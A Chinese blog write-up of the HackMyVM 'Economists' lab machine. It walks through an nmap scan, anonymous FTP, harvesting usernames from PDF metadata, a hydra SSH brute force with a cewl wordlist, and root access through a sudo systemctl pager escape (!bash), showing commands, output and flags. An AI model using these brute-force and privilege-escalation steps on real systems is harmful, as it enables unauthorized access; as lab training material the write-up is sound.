[HackMyVM]靶场Economists

最新推荐文章于 2024-05-27 21:56:13 发布
最新推荐文章于 2024-05-27 21:56:13 发布
阅读量305 收藏 4
点赞数 10
分类专栏: hackmyvm 文章标签: 网络空间安全 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/137379263
版权

难度:Easy

kali:192.168.56.104

靶机:192.168.56.145

端口扫描

┌──(root㉿kali2)-[~]
└─# nmap 192.168.56.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 18:58 CST
Nmap scan report for 192.168.56.145
Host is up (0.000081s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E0:55:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

开启端口:21 22 80

试一下ftp匿名登录

┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.145
Connected to 192.168.56.145.
220 (vsFTPd 3.0.3)
Name (192.168.56.145:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11414|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000       173864 Sep 13  2023 Brochure-1.pdf
-rw-rw-r--    1 1000     1000       183931 Sep 13  2023 Brochure-2.pdf
-rw-rw-r--    1 1000     1000       465409 Sep 13  2023 Financial-infographics-poster.pdf
-rw-rw-r--    1 1000     1000       269546 Sep 13  2023 Gameboard-poster.pdf
-rw-rw-r--    1 1000     1000       126644 Sep 13  2023 Growth-timeline.pdf
-rw-rw-r--    1 1000     1000      1170323 Sep 13  2023 Population-poster.pdf
226 Directory send OK.

好多pdf文件,get下来看了一下,pdf上面没什么东西,分析一下有什么username

┌──(root㉿kali2)-[~/Desktop]
└─# exiftool *.pdf | grep Author
Author                          : joseph
Author                          : richard
Author                          : crystal
Author                          : catherine
Author                          : catherine

拿到几个用户名,可能有用

先随便扫一下

┌──(root㉿kali2)-[~]
└─# gobuster dir -u http://192.168.56.145 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.145
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.145/images/]
/index.html           (Status: 200) [Size: 35027]
/about.html           (Status: 200) [Size: 23219]
/contact.html         (Status: 200) [Size: 14317]
/blog.html            (Status: 200) [Size: 15196]
/main.html            (Status: 200) [Size: 931]
/services.html        (Status: 200) [Size: 17709]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.145/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.145/js/]
/cases.html           (Status: 200) [Size: 18018]
/readme.txt           (Status: 200) [Size: 410]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.145/fonts/]
/.html                (Status: 403) [Size: 279]
Progress: 433406 / 1323366 (32.75%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 433517 / 1323366 (32.76%)
===============================================================
Finished
===============================================================

去web看下

没找到什么利用点

尝试用获取的username爆破一下ssh,用rockyou没爆破出来,可能字典不对,用cewl获取网页单词生成字典

┌──(root㉿kali2)-[~/Desktop]
└─# cewl http://192.168.56.145 > passes.txt

┌──(root㉿kali2)-[~/Desktop]
└─# hydra -L user.txt -P passes.txt ssh://192.168.56.145 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 19:22:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1848 login tries (l:4/p:462), ~29 tries per task
[DATA] attacking ssh://192.168.56.145:22/
[22][ssh] host: 192.168.56.145   login: joseph   password: wealthiest
[STATUS] 494.00 tries/min, 494 tries in 00:01h, 1386 to do in 00:03h, 32 active

拿到一组账号密码 joseph:wealthiest

直接拿到user flag

┌──(root㉿kali2)-[~/Desktop]
└─# ssh joseph@192.168.56.145 
The authenticity of host '192.168.56.145 (192.168.56.145)' can't be established.
ED25519 key fingerprint is SHA256:nKBoUMUnxyKH34KaiDU6gjV4RVOrd181pL9rHCLLD0s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.145' (ED25519) to the list of known hosts.
joseph@192.168.56.145's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 04 Apr 2024 11:25:01 AM UTC

  System load:  0.26               Processes:               115
  Usage of /:   47.3% of 11.21GB   Users logged in:         0
  Memory usage: 7%                 IPv4 address for enp0s3: 192.168.56.145
  Swap usage:   0%


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

51 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


joseph@elite-economists:~$ id
uid=1001(joseph) gid=1001(joseph) groups=1001(joseph)
joseph@elite-economists:~$ ls -al
total 32
drwxr-xr-x 4 joseph joseph 4096 Apr  4 11:23 .
drwxr-xr-x 6 root   root   4096 Sep 13  2023 ..
-rw------- 1 joseph joseph    0 Sep 14  2023 .bash_history
-rw-r--r-- 1 joseph joseph  220 Sep 13  2023 .bash_logout
-rw-r--r-- 1 joseph joseph 3771 Sep 13  2023 .bashrc
drwx------ 2 joseph joseph 4096 Apr  4 11:23 .cache
drwxrwxr-x 3 joseph joseph 4096 Sep 13  2023 .local
-rw-r--r-- 1 joseph joseph  807 Sep 13  2023 .profile
-rw-rw-r-- 1 joseph joseph 3271 Sep 14  2023 user.txt
joseph@elite-economists:~$ cat user.txt 


                                                                                                    
                                                                                                    
                      ...................                 ....................                      
                 .............................        .............................                 
             ............              ...........     ......              ............             
           ........                         ........                             ........           
        ........              ...              ........           ....              .......         
       ......                .....         ..     ......          .....                ......       
     .............................        .....     ......        .............................     
    ..............................       .....        .....       ..............................    
                                        .....          .....                                        
                                       .....            .....                                       
                                      .....              .....                                      
                                      .....              .....                                      
                                     .....                ....                                      
 .................................................................................................. 
................................................................................................... 
                                     .....               .....                                      
                                      .....              .....                                      
                                      .....              .....                                      
                                       .....            .....                                       
                                        .....          .....                                        
    ..............................       .....        .....       ..............................    
     .............................        ......     .....        .............................     
       ......                .....         .......     ..         .....                ......       
        ........              ...            .......              ....              .......         
           ........                            .........                         ........           
             ...........               ......     ...........               ...........             
                ..............................       ..............................                 
                     .....................                ....................                      
                                                                                                    
                                                                                                    
Flag: HMV{37q3p33CsMJgJQbrbYZMUFfTu}

sudo -l

joseph@elite-economists:~$ sudo -l
Matching Defaults entries for joseph on elite-economists:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joseph may run the following commands on elite-economists:
    (ALL) NOPASSWD: /usr/bin/systemctl status

直接执行

sudo /usr/bin/systemctl status

然后再底端命令行输入!bash就拿到了root权限

joseph@elite-economists:~$ sudo /usr/bin/systemctl status
● elite-economists
    State: running
     Jobs: 0 queued
   Failed: 0 units
    Since: Thu 2024-04-04 10:57:17 UTC; 32min ago
   CGroup: /
           ├─user.slice 
           │ └─user-1001.slice 
           │   ├─user@1001.service …
           │   │ └─init.scope 
           │   │   ├─1776 /lib/systemd/systemd --user
           │   │   └─1777 (sd-pam)
           │   └─session-4.scope 
           │     ├─1760 sshd: joseph [priv]
           │     ├─1856 sshd: joseph@pts/0
           │     ├─1857 -bash
           │     ├─1898 sudo /usr/bin/systemctl status
           │     ├─1899 /usr/bin/systemctl status
           │     └─1900 pager
           ├─init.scope 
           │ └─1 /sbin/init maybe-ubiquity
           └─system.slice 
             ├─apache2.service 
             │ ├─759 /usr/sbin/apache2 -k start
             │ ├─764 /usr/sbin/apache2 -k start
             │ └─765 /usr/sbin/apache2 -k start
             ├─systemd-networkd.service 
             │ └─641 /lib/systemd/systemd-networkd
             ├─systemd-udevd.service 
             │ └─393 /lib/systemd/systemd-udevd
             ├─cron.service 
             │ └─659 /usr/sbin/cron -f
             ├─polkit.service 
             │ └─667 /usr/lib/policykit-1/polkitd --no-debug
             ├─networkd-dispatcher.service 
!bash
root@elite-economists:/home/joseph# id
uid=0(root) gid=0(root) groups=0(root)

root@elite-economists:~# cat ro*


                                                                                                    
                                                                                                    
                      ...................                 ....................                      
                 .............................        .............................                 
             ............              ...........     ......              ............             
           ........                         ........                             ........           
        ........              ...              ........           ....              .......         
       ......                .....         ..     ......          .....                ......       
     .............................        .....     ......        .............................     
    ..............................       .....        .....       ..............................    
                                        .....          .....                                        
                                       .....            .....                                       
                                      .....              .....                                      
                                      .....              .....                                      
                                     .....                ....                                      
 .................................................................................................. 
................................................................................................... 
                                     .....               .....                                      
                                      .....              .....                                      
                                      .....              .....                                      
                                       .....            .....                                       
                                        .....          .....                                        
    ..............................       .....        .....       ..............................    
     .............................        ......     .....        .............................     
       ......                .....         .......     ..         .....                ......       
        ........              ...            .......              ....              .......         
           ........                            .........                         ........           
             ...........               ......     ...........               ...........             
                ..............................       ..............................                 
                     .....................                ....................                      
                                                                                                    
                                                                                                    
Flag: HMV{NwER6XWyM8p5VpeFEkkcGYyeJ}

这才是easy难度的

tao0845
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Game theory for applied economists
11-03
外国著名博弈论读物,可以应用到很多方面,政治、军事、经济、信息等
Aisian Economists.pdf
12-01
很好的专业英文图书~从论坛里花大价钱买来的呢~
Economists 阅读目录
hello world
12-22 223
https://helloagain.blog.csdn.net/article/details/122078816 【2021-12-11】给电动车充电这件麻烦事儿 The tricky business of charging electric cars
Unyielding
ayst_ayst的专栏
09-05 211
* through universal suffrage        suffrage
Empire of the sums
ayst_ayst的专栏
09-02 235
url: http://www.economist.com/news/books-and-arts/21613162-mass-immigration-chinese-people-africa-almost-entirely-driven-money 1. "ni hao" and 'chi ku'  may be the two commonest p
Learning from the enemy
ayst_ayst的专栏
09-02 274
* ...seems to have been taking lessons from the other
What China wants
ayst_ayst的专栏
08-29 474
url: http://www.economist.com/news/essays/21609649-china-becomes-again-worlds-largest-economy-it-wants-respect-it-enjoyed-centuries-past-it-does-not
[论文笔记]SELF-INSTRUCT
日积月累,天道酬勤
05-27 960
作者提出了SELF-INSTRUCT,一种通过利用预训练语言模型自我生成来改进模型遵循指令能力的框架。首先从语言模型中生成指令、输入和输出样本,然后过滤无效或相似的样本。最后微调原始模型。
【LLM】self-instruct 构建指令微调数据集
发现问题,并解决问题,批判性思维
07-18 3854
四部曲:指令生成;分类任务识别;实例生成;过滤和后处理。 为了实证评估SELF-INSTRUCT,在GPT3(Brown等人,2020)上运行该框架,在这个模型上的SELF-INSTRUCT迭代过程产出了大约52K条指令,以及大约82K个实例输入和目标输出对。结果数据提供了多种多样的创造性任务,其中50%以上的任务与种子指令的重合度低于0.3 ROUGE-L(§4.2)。可以利用生成的指令数据微调其他大模型。 二、具体过程 1. 指令生成 175个种子任务(每个对应1个指令+1个实例),从该任务池中随机抽取
Mini CFA 考试练习题 Microeconomics
大数据AI笔记
01-02 3176
微观经济学部分一共61道题目,第一次刷题正确率66%。 Q. Economics is the study of: an economy as a whole. choices in the presence of limited or scarce resources. how individuals and companies make decisions to allocate limi...
企业的性质:诺奖得主科斯经典原文翻译及解读1
热门推荐
白马负金羁
10-12 1万+
罗纳德·哈里·科斯,著名经济学家,新制度经济学鼻祖。因发现并阐明了交易成本和产权在经济组织和制度结构中的重要性及其在经济活动中的作用而获得1991年诺贝尔经济学奖。科斯在其1937年发表的文章《企业的性质》一文中,首次创造性地提出了“交易费用”的概念,该篇文章也成为新制度经济学的开山之作。本系列文章是对《企业的性质》一文的翻译和解读
Mathematics For Economists
05-07
经济数学,Mathematics For Economists-Simon & Blume. 资源来互联网
Math Camp for Economists Duke
02-11
Math Camp for master students major in Economists.
git-for-economists
06-26
git-for-经济学家 本文档旨在简单实用地介绍 git 版本控制的好处和基础知识,面向目前使用 Dropbox 或类似文件共享系统进行协作的经济学家的受众。 一些有用的参考资料
chromedriver-win64_121.0.6123.0.zip
06-15
chromedriver-win64_121.0.6123.0.zip
Chekiang Shu Ke Sung-mianfeiziti字體下載
最新发布
06-15
Chekiang Shu Ke Sung-mianfeiziti字體下載
中国科学院大学22-23秋季学期 《程序设计基础与实验(C语言)》课程大作业——基于Min-Max搜索策略的五子棋对战程序
06-15
C语言是一种广泛使用的编程语言,它具有高效、灵活、可移植性强等特点,被广泛应用于操作系统、嵌入式系统、数据库、编译器等领域的开发。C语言的基本语法包括变量、数据类型、运算符、控制结构(如if语句、循环语句等)、函数、指针等。在编写C程序时,需要注意变量的声明和定义、指针的使用、内存的分配与释放等问题。C语言中常用的数据结构包括: 1. 数组:一种存储同类型数据的结构,可以进行索引访问和修改。 2. 链表:一种存储不同类型数据的结构,每个节点包含数据和指向下一个节点的指针。 3. 栈:一种后进先出(LIFO)的数据结构,可以通过压入(push)和弹出(pop)操作进行数据的存储和取出。 4. 队列:一种先进先出(FIFO)的数据结构,可以通过入队(enqueue)和出队(dequeue)操作进行数据的存储和取出。 5. 树:一种存储具有父子关系的数据结构,可以通过中序遍历、前序遍历和后序遍历等方式进行数据的访问和修改。 6. 图:一种存储具有节点和边关系的数据结构,可以通过广度优先搜索、深度优先搜索等方式进行数据的访问和修改。 这些数据结构在C语言中都有相应的实现方式,可以应用于各种不同的场景。C语言中的各种数据结构都有其优缺点,下面列举一些常见的数据结构的优缺点: 数组: 优点:访问和修改元素的速度非常快,适用于需要频繁读取和修改数据的场合。 缺点:数组的长度是固定的,不适合存储大小不固定的动态数据,另外数组在内存中是连续分配的,当数组较大时可能会导致内存碎片化。 链表: 优点:可以方便地插入和删除元素,适用于需要频繁插入和删除数据的场合。 缺点:访问和修改元素的速度相对较慢,因为需要遍历链表找到指定的节点。 栈: 优点:后进先出(LIFO)的特性使得栈在处理递归和括号匹配等问题时非常方便。 缺点:栈的空间有限,当数据量较大时可能会导致栈溢出。 队列: 优点:先进先出(FIFO)的特性使得
高级信息通信运行管理员第七套试卷
06-15
这是高级信息通信运行管理员考证试卷
Java编写一个程序,将下述大写字符串转换成小写字符串,并显示出来。 ECONOMISTS QUESTION EFFECT OF STIMULUS PLAN 把下面程序补充完整,并调试通过写出结果
05-31
可以使用Java中的String类的toLowerCase()方法将大写字符串转换为小写字符串。下面是程序的完整代码: ```java public class Main { public static void main(String[] args) { String str = "ECONOMISTS QUESTION EFFECT OF STIMULUS PLAN"; String lowerCaseStr = str.toLowerCase(); System.out.println(lowerCaseStr); } } ``` 程序运行结果为: ``` economists question effect of stimulus plan ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值